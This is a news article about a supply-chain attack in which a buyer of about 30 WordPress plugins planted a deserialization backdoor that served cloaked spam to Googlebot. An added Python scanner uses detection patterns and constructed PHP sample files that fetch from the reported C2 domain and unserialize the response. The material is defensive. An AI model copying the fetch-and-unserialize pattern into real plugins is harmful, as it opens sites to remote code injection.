Someone bought 30 WordPress plugins and planted backdoors in all of them

April 15, 2026 - 2:14 pm

An attacker purchased 30+ WordPress plugins (the Essential Plugin portfolio) on Flippa for a six-figure sum in August 2025 and secretly injected a PHP deserialization backdoor into each one. Eight months later, in April 2026, the attacker activated the payload, which served cloaked SEO spam exclusively to Googlebot while website owners remained unaware.

WordPress.org shut down the plugins on April 7th, 2026, permanently closing every plugin from the Essential Plugin author. This attack, one of the most sophisticated supply chain compromises the platform has faced, exploited a critical structural gap: WordPress lacks mechanisms for reviewing plugin ownership transfers or requiring code signing for updates.

The buyer, identified as "Kris" with a background in SEO, cryptocurrency, and online gambling marketing, acquired the plugins through Flippa, a marketplace for digital businesses. Flippa even published a case study about the sale in July 2025, unaware of the hidden backdoor.

Eight months passed without incident, allowing the malicious code to gain trust. The payload activated on April 5th and 6th, 2026, during a six-hour, 44-minute window (04:22 to 11:06 UTC), distributing spam through a command-and-control domain (analytics.essentialplugin.com) to websites running the compromised plugins.

The payload's sophistication lay in its restraint: it served malicious content only to Googlebot, keeping website owners completely unaware. It used an Ethereum smart contract for C2 infrastructure, making it resistant to traditional takedowns.
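For site owners checking their own installs, here is an added triage example (not code from the article, the plugins, or WordPress.org). It walks a `wp-content/plugins` directory and flags PHP files that reference the command-and-control domain named above. As an assumed generic heuristic, not the backdoor's real signature, it also flags files that both fetch remote content and call `unserialize()`. The plugin names and file contents in `demo()` are constructed.

```python
import re
import tempfile
from pathlib import Path

C2_DOMAIN = "analytics.essentialplugin.com"  # the one indicator the article names
# Assumed heuristics (not the real backdoor's signature): a file that both
# fetches remote content and deserializes data deserves a manual look.
UNSERIALIZE = re.compile(r"\b(?:maybe_)?unserialize\s*\(", re.I)
REMOTE_FETCH = re.compile(r"\b(?:wp_remote_(?:get|post|request)|curl_exec)\s*\(", re.I)

def scan_file(path):
    """Return the names of the rules that fire on one PHP file."""
    text = path.read_text(encoding="utf-8", errors="replace")
    hits = []
    if C2_DOMAIN in text.lower():
        hits.append("c2-domain")
    if UNSERIALIZE.search(text) and REMOTE_FETCH.search(text):
        hits.append("remote-unserialize")
    return hits

def scan_plugins(plugins_dir):
    """Walk a wp-content/plugins directory; return {plugin: {file: [rules]}}."""
    root = Path(plugins_dir)
    report = {}
    for php in sorted(root.rglob("*.php")):
        hits = scan_file(php)
        if hits:
            rel = php.relative_to(root)
            inner = "/".join(rel.parts[1:]) or rel.name  # single-file plugins
            report.setdefault(rel.parts[0], {})[inner] = hits
    return report

def demo():
    """Scan a constructed plugin tree (sample files, not the real plugin code)."""
    samples = {
        "clean-gallery/gallery.php": "<?php $o = maybe_unserialize(get_option('g'));",
        "sample-slider/inc/stats.php": "<?php $r = wp_remote_get('https://"
            + C2_DOMAIN + "/'); $d = unserialize(wp_remote_retrieve_body($r));",
        "sample-forms/update.php": "<?php $b = wp_remote_post($u); $c = unserialize($b['body']);",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in samples.items():
            target = Path(tmp, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")
        return scan_plugins(tmp)

if __name__ == "__main__":
    print(demo())
```

A `remote-unserialize` hit alone is only a prompt for manual review, since legitimate plugins also deserialize data; a `c2-domain` hit matches the indicator the article reports.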